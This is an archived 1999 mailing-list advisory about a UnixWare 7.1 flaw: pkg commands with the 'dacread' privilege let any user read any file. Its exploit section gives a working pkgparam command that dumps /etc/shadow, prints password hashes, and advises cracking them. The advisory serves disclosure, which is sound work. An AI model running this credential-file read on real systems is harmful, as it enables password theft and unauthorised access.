UnixWare and the dacread permission

From: Brock Tellier (btellierat_private)
Date: Fri Dec 03 1999 - 20:21:17 PST

Next message: Brock Tellier: "UnixWare gain root with non-su/gid binaries"

Previous message: Brock Tellier: "UnixWare read/modify users' mail"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Greetings,

OVERVIEW
Any user may read any file on the system.

BACKGROUND
Only UnixWare 7.1 has been tested.

DETAILS
As previously stated, UnixWare binaries gain additional privileges via
standard suid/sgid AND /etc/security/tcb/privs.  The majority of the UnixWare
"pkg" command, such as pkginfo, pkgcat, pkgparam, etc, are vulnerable to a bug
which will allow any user to read any file on the system as a result of their
additional "dacread" permission in the privs file.

The dacread permission allows a process to override the Discretionary Access
Controls (DAC) for read-only operations.  Basically, a process with the
dacread permissions is able to bypass the mode bits and ownership on a file,
but only for reading it.  A process with dacwrite permissions can bypass mode
bits to write to or execute that file.

I'm pretty sure that the bugs I found in the pkg commands were introduced by
their addition to the privs file.  As far as I can tell, there is virtually no
reason for them to be able to read any file on the system.  

All around, this additional privilege thing, well, sucks.  Consider now that
the truss(1) command will allow the user to see any file i/o that happens
between a process and the system since it isn't suid/sgid.  Thus, if there is
*any* way that you can make pkg* read from a file, even if the output is never
printed, you can examine truss output to get the file's contents.

EXPLOIT
The worst offender of pkg* is pkgparam, which will print the contents of a
file to stdout, though I've been able to get most of the pkg program to read
from /etc/shadow in one way or another and grab the contents with truss.

bash-2.02$ ls -la /bin/pkgparam
-r-xr-xr-x    1 root     sys          166784 May 21  1999
/bin/pkgparam
bash-2.02$ /bin/pkgparam -f /etc/shadow
Dy0l3OC7XHsj.:10925::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
BgusHRQZ9MH2U:10878::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
nv.Xrh2V3vArc:10882::::::
ozT.yeRe1/dxY:10882::::::
RinwpQfqabYbc:10928::::::
bash-2.02$ 
Now just concatenate the first field of /etc/passwd with this file and run
your favorite cracker.

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellierat_private


____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1

Next message: Brock Tellier: "UnixWare gain root with non-su/gid binaries"
Previous message: Brock Tellier: "UnixWare read/modify users' mail"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:17:00 PDT